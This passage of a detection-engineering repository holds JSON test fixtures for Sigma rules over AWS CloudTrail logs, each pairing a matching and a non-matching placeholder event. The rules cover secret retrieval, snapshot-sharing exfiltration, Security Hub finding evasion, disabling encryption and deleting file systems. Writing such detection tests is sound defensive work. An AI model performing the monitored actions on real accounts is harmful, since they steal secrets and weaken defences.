"arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "sso-directory.amazonaws.com", 27 | "eventName": "AssociateDirectory", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AssociateDirectory", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_acl_entries_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "CreateNetworkAclEntry", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateNetworkAclEntry", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_lambda_function_url_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "lambda.amazonaws.com", 27 | "eventName": "CreateFunctionUrlConfig", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateFunctionUrlConfig", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_getsecrets_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "secretsmanager.amazonaws.com", 27 | "eventName": "GetSecretValue", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSecretValue", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_batchgetsecretvalue_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "secretsmanager.amazonaws.com", 27 | "eventName": "GetSecretValue", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSecretValue", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_securityhub_finding_evasion_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "securityhub.amazonaws.com", 27 | "eventName": "BatchUpdateFindings", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "BatchUpdateFindings", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_organizations_leaveorganization_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "organizations.amazonaws.com", 27 | "eventName": "LeaveOrganization", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "LeaveOrganization", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_passed_role_to_glue_development_endpoint_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "glue.amazonaws.com", 27 | "eventName": "CreateDevEndpoint", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateDevEndpoint", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_snapshot_backup_exfiltration_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ModifySnapshotAttribute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ModifySnapshotAttribute", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_disable_encryption_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "DisableEbsEncryptionByDefault", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DisableEbsEncryptionByDefault", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticfilesystem.amazonaws.com", 27 | "eventName": "DeleteFileSystem", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | 